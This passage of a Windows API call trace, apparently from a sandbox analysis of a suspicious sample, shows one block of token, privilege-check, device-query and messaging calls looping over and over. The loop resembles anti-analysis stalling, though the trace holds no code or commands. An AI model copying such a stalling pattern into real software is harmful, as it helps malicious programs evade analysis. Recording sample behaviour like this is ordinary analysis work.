(hProcess=0x0) returned 0x0 [0017.016] GetCurrentThread () returned 0xfffffffe [0017.016] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.016] GetLastError () returned 0x3f0 [0017.016] GetCurrentProcess () returned 0xffffffff [0017.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.016] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.016] SetLastError (dwErrCode=0x522) [0017.016] CloseHandle (hObject=0x114) returned 1 [0017.016] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.016] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.016] GetLastError () returned 0x578 [0017.016] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.016] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.016] GetCurrentThread () returned 0xfffffffe [0017.016] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.016] GetLastError () returned 0x3f0 [0017.016] GetCurrentProcess () returned 0xffffffff [0017.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.017] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.017] SetLastError (dwErrCode=0x522) [0017.017] CloseHandle (hObject=0x114) returned 1 [0017.017] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.017] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.017] GetLastError () returned 0x578 [0017.017] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.017] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.017] GetCurrentThread () returned 0xfffffffe [0017.017] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.017] GetLastError () returned 0x3f0 [0017.017] GetCurrentProcess () returned 0xffffffff [0017.017] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.017] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.017] SetLastError (dwErrCode=0x522) [0017.017] CloseHandle (hObject=0x114) returned 1 [0017.017] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.017] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.017] GetLastError () returned 0x578 [0017.017] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.017] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.017] GetCurrentThread () returned 0xfffffffe [0017.017] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.017] GetLastError () returned 0x3f0 [0017.017] GetCurrentProcess () returned 0xffffffff [0017.017] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.017] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.017] SetLastError (dwErrCode=0x522) [0017.017] CloseHandle (hObject=0x114) returned 1 [0017.017] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.017] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.017] GetLastError () returned 0x578 [0017.017] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.017] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.017] GetCurrentThread () returned 0xfffffffe [0017.017] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.017] GetLastError () returned 0x3f0 [0017.017] GetCurrentProcess () returned 0xffffffff [0017.017] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.017] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.017] SetLastError (dwErrCode=0x522) [0017.017] CloseHandle (hObject=0x114) returned 1 [0017.017] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.017] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.018] GetLastError () returned 0x578 [0017.018] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.018] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.018] GetCurrentThread () returned 0xfffffffe [0017.018] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.018] GetLastError () returned 0x3f0 [0017.018] GetCurrentProcess () returned 0xffffffff [0017.018] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.018] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.018] SetLastError (dwErrCode=0x522) [0017.018] CloseHandle (hObject=0x114) returned 1 [0017.018] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.018] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.018] GetLastError () returned 0x578 [0017.018] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.018] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.018] GetCurrentThread () returned 0xfffffffe [0017.018] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.018] GetLastError () returned 0x3f0 [0017.018] GetCurrentProcess () returned 0xffffffff [0017.018] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.018] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.018] SetLastError (dwErrCode=0x522) [0017.018] CloseHandle (hObject=0x114) returned 1 [0017.018] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.018] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.018] GetLastError () returned 0x578 [0017.018] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.018] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.018] GetCurrentThread () returned 0xfffffffe [0017.018] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.018] GetLastError () returned 0x3f0 [0017.018] GetCurrentProcess () returned 0xffffffff [0017.018] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.018] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.018] SetLastError (dwErrCode=0x522) [0017.018] CloseHandle (hObject=0x114) returned 1 [0017.018] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.018] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.018] GetLastError () returned 0x578 [0017.018] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.018] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.018] GetCurrentThread () returned 0xfffffffe [0017.018] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.019] GetLastError () returned 0x3f0 [0017.019] GetCurrentProcess () returned 0xffffffff [0017.019] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.019] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.019] SetLastError (dwErrCode=0x522) [0017.019] CloseHandle (hObject=0x114) returned 1 [0017.019] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.019] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.019] GetLastError () returned 0x578 [0017.019] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.019] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.019] GetCurrentThread () returned 0xfffffffe [0017.019] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.019] GetLastError () returned 0x3f0 [0017.019] GetCurrentProcess () returned 0xffffffff [0017.019] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.019] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.019] SetLastError (dwErrCode=0x522) [0017.019] CloseHandle (hObject=0x114) returned 1 [0017.019] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.019] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.019] GetLastError () returned 0x578 [0017.019] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.019] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.019] GetCurrentThread () returned 0xfffffffe [0017.019] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.019] GetLastError () returned 0x3f0 [0017.019] GetCurrentProcess () returned 0xffffffff [0017.019] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.019] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.019] SetLastError (dwErrCode=0x522) [0017.019] CloseHandle (hObject=0x114) returned 1 [0017.019] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.019] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.019] GetLastError () returned 0x578 [0017.019] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.019] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.019] GetCurrentThread () returned 0xfffffffe [0017.019] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.019] GetLastError () returned 0x3f0 [0017.019] GetCurrentProcess () returned 0xffffffff [0017.019] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.019] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.019] SetLastError (dwErrCode=0x522) [0017.020] CloseHandle (hObject=0x114) returned 1 [0017.020] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.020] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.020] GetLastError () returned 0x578 [0017.020] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.020] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.020] GetCurrentThread () returned 0xfffffffe [0017.020] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.020] GetLastError () returned 0x3f0 [0017.020] GetCurrentProcess () returned 0xffffffff [0017.020] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.020] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.020] SetLastError (dwErrCode=0x522) [0017.020] CloseHandle (hObject=0x114) returned 1 [0017.020] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.020] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.020] GetLastError () returned 0x578 [0017.020] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.020] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.020] GetCurrentThread () returned 0xfffffffe [0017.020] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.020] GetLastError () returned 0x3f0 [0017.020] GetCurrentProcess () returned 0xffffffff [0017.020] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.020] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.020] SetLastError (dwErrCode=0x522) [0017.020] CloseHandle (hObject=0x114) returned 1 [0017.020] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.020] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.020] GetLastError () returned 0x578 [0017.020] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.020] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.020] GetCurrentThread () returned 0xfffffffe [0017.020] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.020] GetLastError () returned 0x3f0 [0017.020] GetCurrentProcess () returned 0xffffffff [0017.020] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.020] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.020] SetLastError (dwErrCode=0x522) [0017.020] CloseHandle (hObject=0x114) returned 1 [0017.020] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.020] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.020] GetLastError () returned 0x578 [0017.020] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.020] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.021] GetCurrentThread () returned 0xfffffffe [0017.021] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.021] GetLastError () returned 0x3f0 [0017.021] GetCurrentProcess () returned 0xffffffff [0017.021] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.021] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.021] SetLastError (dwErrCode=0x522) [0017.021] CloseHandle (hObject=0x114) returned 1 [0017.021] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.021] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.021] GetLastError () returned 0x578 [0017.021] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.021] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.021] GetCurrentThread () returned 0xfffffffe [0017.021] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.021] GetLastError () returned 0x3f0 [0017.021] GetCurrentProcess () returned 0xffffffff [0017.021] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.021] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.021] SetLastError (dwErrCode=0x522) [0017.021] CloseHandle (hObject=0x114) returned 1 [0017.021] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.021] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.021] GetLastError () returned 0x578 [0017.021] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.021] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.021] GetCurrentThread () returned 0xfffffffe [0017.021] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.021] GetLastError () returned 0x3f0 [0017.021] GetCurrentProcess () returned 0xffffffff [0017.021] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.021] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.021] SetLastError (dwErrCode=0x522) [0017.021] CloseHandle (hObject=0x114) returned 1 [0017.021] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.021] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.021] GetLastError () returned 0x578 [0017.021] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.021] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.021] GetCurrentThread () returned 0xfffffffe [0017.021] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.021] GetLastError () returned 0x3f0 [0017.021] GetCurrentProcess () returned 0xffffffff [0017.021] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.022] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.022] SetLastError (dwErrCode=0x522) [0017.022] CloseHandle (hObject=0x114) returned 1 [0017.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.022] GetLastError () returned 0x578 [0017.022] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.022] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.022] GetCurrentThread () returned 0xfffffffe [0017.022] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.022] GetLastError () returned 0x3f0 [0017.022] GetCurrentProcess () returned 0xffffffff [0017.022] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.022] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.022] SetLastError (dwErrCode=0x522) [0017.022] CloseHandle (hObject=0x114) returned 1 [0017.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.022] GetLastError () returned 0x578 [0017.022] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.022] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.022] GetCurrentThread () returned 0xfffffffe [0017.022] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.022] GetLastError () returned 0x3f0 [0017.022] GetCurrentProcess () returned 0xffffffff [0017.022] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.022] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.022] SetLastError (dwErrCode=0x522) [0017.022] CloseHandle (hObject=0x114) returned 1 [0017.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.022] GetLastError () returned 0x578 [0017.022] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.022] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.022] GetCurrentThread () returned 0xfffffffe [0017.022] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.022] GetLastError () returned 0x3f0 [0017.022] GetCurrentProcess () returned 0xffffffff [0017.022] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.022] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.022] SetLastError (dwErrCode=0x522) [0017.022] CloseHandle (hObject=0x114) returned 1 [0017.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.023] GetLastError () returned 0x578 [0017.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: 